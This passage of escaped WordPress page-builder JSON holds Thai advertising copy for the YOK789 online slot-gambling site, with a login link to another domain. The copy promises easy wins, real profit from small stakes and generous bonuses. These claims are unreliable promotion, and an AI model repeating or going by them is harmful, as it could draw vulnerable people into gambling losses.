\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e38\\u0e19\\u0e2b\\u0e19\\u0e32\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e17\\u0e49\\u0e32\\u0e17\\u0e32\\u0e22 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e48\\u0e32\\u0e2a\\u0e19\\u0e43\\u0e08\\u0e02\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e31\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e35\\u0e41\\u0e04\\u0e48\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e42\\u0e04\\u0e15\\u0e23\\u0e44\\u0e27 \\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e17\\u0e35\\u0e48\\u0e17\\u0e38\\u0e01\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2b\\u0e19\\u0e32 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e41\\u0e25\\u0e30\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e16\\u0e39\\u0e01\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e35\\u0e48\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e04\\u0e37\\u0e2d\\u0e21\\u0e35\\u0e17\\u0e35\\u0e21\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e04\\u0e2d\\u0e22\\u0e0b\\u0e31\\u0e1e\\u0e1e\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e35\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e40\\u0e01\\u0e34\\u0e14\\u0e02\\u0e36\\u0e49\\u0e19 <\\/span><a href=\\\"https:\\/\\/luca333auto.com\\/\\\"><b>\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e08\\u0e38\\u0e14\\u0e41\\u0e02\\u0e47\\u0e07\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2a\\u0e21\\u0e48\\u0e33\\u0e40\\u0e2a\\u0e21\\u0e2d \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e08\\u0e33\\u0e40\\u0e08 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e44\\u0e23\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2d\\u0e30\\u0e44\\u0e23\\u0e2a\\u0e14\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e2d\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e49\\u0e32\\u0e27\\u0e41\\u0e23\\u0e01\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e2a\\u0e49\\u0e19\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e18\\u0e23\\u0e23\\u0e21\\u0e14\\u0e32<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6b44269\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li><h3><span style=\\\"color: #99cc00;\\\"><b>YOK789 <\\/b><\\/span><b><span style=\\\"color: #99cc00;\\\">\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21<\\/span> <\\/b><\\/h3><\\/li><\\/ul><p><b><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e17\\u0e35\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e22\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e01\\u0e31\\u0e4a\\u0e01 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e42\\u0e1b\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e27\\u0e35\\u0e22\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e48\\u0e27\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e15\\u0e25\\u0e2d\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e21\\u0e35\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32\\u0e1b\\u0e01\\u0e15\\u0e34 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e1e\\u0e35\\u0e04\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e41\\u0e04\\u0e48\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e25\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e21\\u0e35\\u0e1a\\u0e39\\u0e2a\\u0e15\\u0e4c\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2b\\u0e27\\u0e31\\u0e07\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e14\\u0e31\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e44\\u0e14\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e19\\u0e35\\u0e22\\u0e19 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e27\\u0e48\\u0e32\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e0a\\u0e31\\u0e14\\u0e17\\u0e38\\u0e01\\u0e22\\u0e2d\\u0e14<\\/span><\\/b><\\/p><ul><li><h3><b><span style=\\\"color: #99cc00;\\\">\\u0e43\\u0e0a\\u0e49\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49<\\/span> <\\/b><\\/h3><\\/li><\\/ul><p><b><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e32\\u0e22\\u0e07\\u0e1a\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e16\\u0e2d\\u0e22\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e1a\\u0e17\\u0e2a\\u0e1a\\u0e32\\u0e22\\u0e01\\u0e23\\u0e30\\u0e40\\u0e1b\\u0e4b\\u0e32 \\u0e41\\u0e04\\u0e48\\u0e21\\u0e35\\u0e17\\u0e38\\u0e19\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e2a\\u0e34\\u0e1a\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e17\\u0e32\\u0e07\\u0e44\\u0e14\\u0e49\\u0e44\\u0e27 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e14\\u0e14\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e38\\u0e19\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e1b\\u0e31\\u0e49\\u0e19\\u0e01\\u0e33\\u0e44\\u0e23\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e01\\u0e47\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e04\\u0e37\\u0e2d\\u0e41\\u0e21\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e17\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e21\\u0e32\\u0e01\\u0e01\\u0e47\\u0e22\\u0e31\\u0e07\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1a\\u0e48\\u0e07\\u0e0a\\u0e19\\u0e0a\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e17\\u0e48\\u0e32\\u0e01\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e49\\u0e27\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e15\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e42\\u0e15\\u0e02\\u0e36\\u0e49\\u0e19\\u0e15\\u0e32\\u0e21\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07<\\/span><\\/b><\\/p><ul><li><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e04\\u0e23\\u0e1a <\\/b><\\/span><\\/h3><\\/li><\\/ul><p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e19\\u0e27\\u0e44\\u0e27\\u0e49\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22 \\u0e27\\u0e31\\u0e12\\u0e19\\u0e18\\u0e23\\u0e23\\u0e21 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e49\\u0e33\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e16\\u0e39\\u0e01\\u0e04\\u0e31\\u0e14\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e19\\u0e49\\u0e19\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e42\\u0e25\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07 \\u0e08\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e0a\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e01\\u0e23\\u0e30\\u0e08\\u0e32\\u0e22\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e01\\u0e47\\u0e21\\u0e35\\u0e15\\u0e31\\u0e27\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e21\\u0e35\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e14\\u0e23\\u0e2d\\u0e1b \\u0e43\\u0e04\\u0e23\\u0e40\\u0e1a\\u0e37\\u0e48\\u0e2d\\u0e2d\\u0e30\\u0e44\\u0e23\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e46 \\u0e01\\u0e47\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e41\\u0e19\\u0e27\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e25\\u0e31\\u0e07\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e27\\u0e31\\u0e19\\u0e44\\u0e21\\u0e48\\u0e19\\u0e48\\u0e32\\u0e40\\u0e1a\\u0e37\\u0e48\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e2a\\u0e31\\u0e19\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-1-.webp\",\"id\":294,\"size\":\"\",\"alt\":\"yok789\",\"